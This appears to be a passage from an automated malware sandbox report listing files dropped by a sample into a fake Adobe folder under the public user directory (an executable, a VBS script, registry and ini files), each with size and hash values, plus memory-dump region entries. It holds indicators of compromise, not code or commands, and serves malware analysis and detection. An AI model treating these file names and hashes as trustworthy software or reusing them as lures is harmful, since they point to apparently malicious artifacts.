0b3d8279120fb5fa27efbd9eee89695aa040fc24

SHA256
ef54f46b9f1e342fc12e035ae94f57c61ea4e8be4e116f0a1c6f86310f400f49

SHA512
a6b0d557e9eec4e56630e5ba64495df318f4fd959fffbdcbf77831185b067906917c9117a0ecd6ac817c7860d5d831cce15820d715657d81e2d817d9fab9fb72

Download Submit
C:\users\public\Public Document\Adobe\page\004.004
Filesize
1KB

MD5
b0cc2e6f2d8036c9b5fef218736fa9c9

SHA1
64fd3017625979c95ba09d7cbea201010a82f73f

SHA256
997aceeb78143e057d4ea0ed699db3cc1c723f699b4532663b7b85c83baa5c50

SHA512
a1fe80b2971c4d1141a594f27eaea61500bf701cd1b8fbdb5ac2204a63c8ef862344f8c30f65ce769f0acf2b0718ed33a02744dd1a152c4a62a5318333d29b9b

Download Submit
C:\users\public\Public Document\Adobe\page\Acro1.pmd
Filesize
930KB

MD5
e4796d934056f5f73ed8d4ef720bbded

SHA1
c7b8a3a71999200890f0cadde10b3df27931cb2b

SHA256
8fd8e618e3dda81cb03a2c125702243471c8ce1e0a29eda56226d67890cf421f

SHA512
7eb58779771eed73f0bde30476178ebd6d853166a30022684912b93446fe1ced5ee6d484cba5ce6b7e1da6d211a9b24190dbce933d0ab61d843cd350da8a3132

Download Submit
C:\users\public\Public Document\Adobe\page\Acropa2.exe
Filesize
156KB

MD5
2a6c92c59f349897550fc08f44d37dd9

SHA1
d012eb89bb2459c74f3d8905be1a225321fce7ee

SHA256
51b6dd1bf3c81ae23ab538d264e70409a129d9aacd9f94ad74c3d06283809568

SHA512
fcf858d1ef800b05c63fa68225f027ce8d1949357ba753bfcf0567e2b860f1afb7bc9b95267f34e9ad9c1ece5565dc28cd6ef3b8d610d813b3c6a68957ea790a

Download Submit
C:\users\public\Public Document\Adobe\page\Adbe1.pmd
Filesize
221KB

MD5
9b1a2a1e76dbeb4b54dfb72b45a06385

SHA1
1db401fd8239e96c50bdd5b5df090700d06c3379

SHA256
558ad3e72f8e447306f755d7960e6eadcb3beba0c153961ebabb470652f4955f

SHA512
01cfccd38b69b84148d7886da50bb269f03ca35a010ec0cce5d300633f5f239097b4316977dbb2d51d29223ab888dbb03080b221b7ce169f38f40890b7fb7f8c

Download Submit
C:\users\public\Public Document\Adobe\page\Adobe1.pmd
Filesize
1.8MB

MD5
0482e1516224b62c2c61cef68b205a70

SHA1
e9f3c1e81052672823ed3920f7877fba55638272

SHA256
dfb31573de3d3145c5f33d7b146fee1b511b3d8e35641805b760eb93d3174efa

SHA512
3ffd2b28aa4846b21debb425026832fa9086c51a8608f8b89c6df7952640db7c64407d199b4cbe4478de84dc08e32ee7e2cf8986c96ef7d68b48a937e9039108

Download Submit
C:\users\public\Public Document\Adobe\page\Bcro1.pmd
Filesize
932KB

MD5
a4547cfa6e54c70478b4ce48f0c4a3db

SHA1
4c58d77d64acaa0ca38cf8ba565659e70e13773b

SHA256
833bb76d449b668542585167238e6ca9caf80e5cd41656157960d7d73c0f8548

SHA512
2dd848623fee7129c2628ae660282d9e5a2d03b86988dee91ea6671d85621c4dffb5b9bd96ef9cdc6d9812d63c7fd292c8b6215b85ccfde97a2c14a4860bf2d9

Download Submit
C:\users\public\Public Document\Adobe\page\Bdoc.pdf
Filesize
58B

MD5
4ca681147f7d55321b896749196e9909

SHA1
720a247ea2ba5e717ba5c7ab6833cb7741af8a74

SHA256
c8bd248ec662e5f1c90c54c29b4217ab2c398642f7c5f43cbd9a917881063832

SHA512
82a4cd1f9d6ef8c42484b48948539d3c4ab3e8e61f38914ccb2e452a2d6f67a49343277ad710e810da39992a4f5740f85a867281a739b877b401dd6a4e74aef3

Download Submit
C:\users\public\Public Document\Adobe\page\aaaa2.mdv
Filesize
420B

MD5
36b365ae9ef850c35b372b9f4a5b9cf9

SHA1
ce787ea46a34cf9259f41eb3418c5efa18f0f6e5

SHA256
4f8821e5d2eb7c638dd1f82b60eed081fb5cdd3232fdcd4e3cc28e7f2288ffa6

SHA512
66671419f16569f54b6a3766e9a571428be69953a1280939b95cd8fcbdfb4fa3de44c42b5be8a73ae7026872a09d312ff0a29c1434d234525f878d169b4b752d

Download Submit
C:\users\public\Public Document\Adobe\page\dro.pdf
Filesize
506KB

MD5
6a7359fe6a453c51da4257619a8b00b9

SHA1
c6b28e91665c23bd689bb6b94a5808624eb42ab7

SHA256
463aa6aba59b77d6c1990a119b55f378caa3597b8962803ce06696a4156453ed

SHA512
bee034968cb9c9bedf40ce9d79eb50cdd830fbaebaec21e3624609484f717f61fa5f3f026436d56a3e432066ac72ee1a1f8ecb7a029d0b39ab174c6460234d4f

Download Submit
C:\users\public\Public Document\Adobe\page\keeprun.ini
Filesize
423B

MD5
2f62fb4caf67f9b14ee86a1c564c944a

SHA1
6bb0ac82efcc757943edbe96c6220f48a644c94a

SHA256
66721ccbde3acb0c6be69424e9a2fca43a1301cf6cfe8aff671a52c5b0238778

SHA512
1699c0959eb47477cec7a2789e39c44d179904d15a986065b24f29ccf51ad396e4225deb49bd1ccb3da75428bd2808e44d34b501d99b54b268c8ba5a46dc2571

Download Submit
C:\users\public\Public Document\Adobe\page\monf1.reg
Filesize
1KB

MD5
6aca80d8af6a1b7737d0c9a3a2f998db

SHA1
f5e00d99db9b9b3179e4d4ca2918f09b5c3f7ba1

SHA256
87b305f8a41e66bc67bae04beaad8a3b3c415432692654f3790bdb0fcaa4a11d

SHA512
f15524d2ead15d0875f3a042d89836f60b43cbdc26a5e10ded6bd67a52c7c572e85290f1a5210cbc21b30258bbe219159062d509d7b323e55688f6db0136828f

Download Submit
C:\users\public\Public Document\Adobe\page\qox.pmd
Filesize
30KB

MD5
9f45d6316d06ec8fac0cf07279823dde

SHA1
576ea2d042112e80c1e2e86e62b0bd584dc06417

SHA256
f1f905558bd1b8fed7683b1de778e616b95c713027ad79e4921147d22ff1198a

SHA512
38a75b6c6cfed66cdea8f9dae022efa11356b90e172178161e989bc2fdd34fbb02cbfcf30fcae28fdbf57bcf0ad0a4b359b66731e51dba158f3d487cebf3aa26

Download Submit
C:\users\public\Public Document\Adobe\page\unzip.pdf
Filesize
164KB

MD5
75375c22c72f1beb76bea39c22a1ed68

SHA1
e1652b058195db3f5f754b7ab430652ae04a50b8

SHA256
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

SHA512
1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Download Submit
C:\users\public\Public Document\Adobe\page\yy3.vbs
Filesize
139B

MD5
b1e8b41efcd2a1a0fa604a7763749047

SHA1
38ffc4c5e5a7ef42098f0f3fb1db31e834e17fd9

SHA256
ce8c42c822ae1141edd54e77e90e5ffda6667a6a3e3dcc92deca9fa243b252d3

SHA512
d5cdef3dccef4d08bdb387e34f4e88e4a2c4c356d047b4477073d176a091a0d2128819c7d43637718cfac78f24c779277e8237fa58f93141030e18547ab43b0a

Download Submit
memory/432-151-0x0000000000000000-mapping.dmp

Download
memory/636-177-0x0000000000400000-0x00000000004F1000-memory.dmp

Filesize
964KB

Download
memory/636-176-0x0000000000400000-0x00000000004F1000-memory.dmp

Filesize
964KB

Download
memory/636-175-0x0000000000400000-0x00000000004F1000-memory.dmp

Filesize
964KB

Download
memory/636-172-0x0000000000000000-mapping.dmp

Download
memory/788-179-0x0000000000000000-mapping.dmp

Download
memory/1136-140-0x0000000000000000-mapping.dmp

Download
memory/1168-167-0x0000000000000000-mapping.dmp

Download
memory/1168-171-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/1168-170-0x0000000000400000-0x00000000004F4000-memory.dmp

Filesize
976KB

Download
memory/1308-144-0x00000000000C0000-0x0000000000147000-memory.dmp

Filesize
540KB

Download
memory/1308-141-0x0000000000000000-mapping.dmp

Download
memory/1868-145-0x0000000000000000-mapping.dmp

Download
memory/1932-152-0x0000000000000000-mapping.dmp

Download
memory/1980-180-0x0000000000000000-mapping.dmp

Download
memory/2096-178-0x0000000000000000-mapping.dmp

Download
memory/2176-205-0x0000000000000000-mapping.dmp

Download
memory/2304-203-0x0000000000000000-mapping.dmp

Download
memory/2428-182-0x0000000000000000-mapping.dmp

Download
memory/2504-200-0x0000000000000000-mapping.dmp

Download
memory/2868-135-0x0000000000000000-mapping.dmp

Download
memory/2912-149-0x0000000000000000-mapping.dmp

Download
memory/2944-204-0x0000000000000000-mapping.dmp

Download
memory/2968-191-0x0000000000000000-mapping.dmp

Download
memory/3184-132-0x0000000000000000-mapping.dmp

Download
memory/3504-188-0x0000000000000000-mapping.dmp

Download
memory/3504-195-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/3660-137-0x0000000000000000-mapping.dmp

Download
memory/3704-161-0x0000000000400000-0x00000000005CE000-memory.dmp

Filesize
1.8MB

Download
memory/3704-162-0x0000000000400000-0x00000000005CE000-memory.dmp

Filesize
1.8MB

Download
memory/3704-158-0x0000000000000000-mapping.dmp

Download
memory/4028-202-0x0000000000000000-mapping.dmp

Download
memory/4496-181-0x0000000000000000-mapping.dmp

Download
memory/4504-166-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4504-163-0x0000000000000000-mapping.dmp

Download
memory/4508-186-0x0000000000000000-mapping.dmp

Download
memory/4616-196-0x0000000000000000-mapping.dmp

Download
memory/4932-197-0x0000000000000000-mapping.dmp

Download